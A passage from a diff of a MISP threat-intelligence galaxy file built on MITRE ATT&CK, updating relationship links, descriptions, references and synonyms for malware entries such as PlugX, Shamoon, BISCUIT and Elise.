"322bad5a-1c49-4d23-ab79-76d641794afa", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3709,40 +4756,19 @@ ], "type": "uses" }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "de6cb631-52f6-4169-a73b-7965390b0c30", @@ -3805,21 +4831,21 @@ "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3833,7 +4859,7 @@ "type": "uses" }, { - "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3847,7 +4873,7 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3867,13 +4893,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", "tags": [ @@ -3882,7 +4901,7 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3896,7 +4915,14 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3930,6 +4956,13 @@ ], "type": "uses" }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -3943,13 +4976,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "c251e4a5-9a2e-4166-8e42-442af75c3b9a", @@ -3987,7 +5013,14 @@ "type": "uses" }, { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4008,7 +5041,14 @@ "type": "uses" }, { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4035,6 +5075,13 @@ ], "type": "uses" }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -4043,14 +5090,7 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4062,20 +5102,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "fb261c56-b80e-43a9-8351-c84081e7213d", @@ -4116,7 +5142,7 @@ "value": "Dendroid - S0301" }, { - "description": "[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. (Citation: Lastline PlugX Analysis) It has been used by multiple threat groups. (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)", + "description": "[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)", "meta": { "external_id": "S0013", "mitre_platforms": [ @@ -4124,13 +5150,15 @@ ], "refs": [ "https://attack.mitre.org/software/S0013", + "http://labs.lastline.com/an-analysis-of-plugx", "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", "http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/", "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", - "http://labs.lastline.com/an-analysis-of-plugx" + "http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf" ], "synonyms": [ "PlugX", + "DestroyRAT", "Sogu", "Kaba", "Korplug" @@ -4166,35 +5194,28 @@ "type": "uses" }, { - "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4208,28 +5229,21 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4243,7 +5257,49 @@ "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4255,13 +5311,62 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", "value": "PlugX - S0013" }, { - "description": "[Shamoon](https://attack.mitre.org/software/S0140) is malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. The 2.0 version was seen in 2016 targeting Middle Eastern states. (Citation: FireEye Shamoon Nov 2016) (Citation: Palo Alto Shamoon Nov 2016)", + "description": "[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)", "meta": { "external_id": "S0140", "mitre_platforms": [ @@ -4269,8 +5374,10 @@ ], "refs": [ "https://attack.mitre.org/software/S0140", - "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://www.symantec.com/connect/blogs/shamoon-attacks", + "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html" ], "synonyms": [ "Shamoon", @@ -4292,6 +5399,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ @@ -4300,7 +5414,63 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4321,84 +5491,7 @@ "type": "uses" }, { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4412,7 +5505,35 @@ "type": "uses" }, { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4472,13 +5593,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -4492,6 +5606,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", @@ -4542,7 +5663,14 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4563,14 +5691,14 @@ "type": "uses" }, { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "54456690-84de-4538-9101-643e26437e09", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4616,7 +5744,7 @@ ], "refs": [ "https://attack.mitre.org/software/S0061", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" ], "synonyms": [ "HDoor", @@ -4651,7 +5779,8 @@ ], "refs": [ "https://attack.mitre.org/software/S0017", - "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip" ], "synonyms": [ "BISCUIT" @@ -4671,6 +5800,69 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "b8eb28e4-48a6-40ae-951a-328714f75eda", @@ -4706,20 +5898,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -4727,6 +5905,41 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -4735,7 +5948,14 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4756,49 +5976,7 @@ "type": "uses" }, { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4812,21 +5990,35 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4878,7 +6070,7 @@ "value": "hcdLoader - S0071" }, { - "description": "[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of\ntools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)", + "description": "[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of\ntools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)", "meta": { "external_id": "S0081", "mitre_platforms": [ @@ -4886,7 +6078,8 @@ ], "refs": [ "https://attack.mitre.org/software/S0081", - "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html" + "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html", + "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf" ], "synonyms": [ "Elise", @@ -4917,21 +6110,7 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4945,56 +6124,21 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - 